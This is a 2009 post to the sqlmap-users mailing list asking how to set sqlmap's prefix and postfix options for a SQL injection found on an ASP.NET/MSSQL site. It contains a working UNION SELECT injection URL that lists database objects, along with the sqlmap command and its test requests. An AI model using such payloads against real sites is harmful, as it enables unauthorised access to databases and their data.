[sqlmap-users] Sqlmap - Injection String
From: Kerem G. <ker...@gm...> - 2009-12-22 19:40:30
Greetings,

I have been manually testing a site built with ASP.NET running MSSQL Server 2005 and identified a GET parameter vulnerable to injection. The site returns *Microsoft OLE DB Provider for ODBC Drivers error '80040e14'* through *[Microsoft][SQL Server Native Client 10.0][SQL Server]* for illegal queries.

The query is a little awkward and I'm having a hard time with specifying *--prefix* and *--postfix* correctly to use sqlmap for this injection.

My valid injection:

http://www.thesite.com/page.asp?p1=string*)')* union select 1,name COLLATE Latin1_General_CI_AS,3,4,5,6,7 from dbo.sysobjects *-- *

The 2nd column is the only one to return output.

This is what I did with sqlmap:

./sqlmap --url www.thesite.com/page.asp?p1=string -p p1 --prefix \)\'\) --postfix "--"

While testing my custom query, sqlmap does the following:

GET /page.asp?p1=string)') AND 967=967 -- HTTP/1.1
GET /page.asp?p1=string)') AND 967=968 -- HTTP/1.1

The query selects the options into a <select> field. Both requests are 200 OK, while both fail to select anything into the <select> field. Thus, sqlmap directly moves on to the predefined tests.

Any suggestions?

Kerem Gunes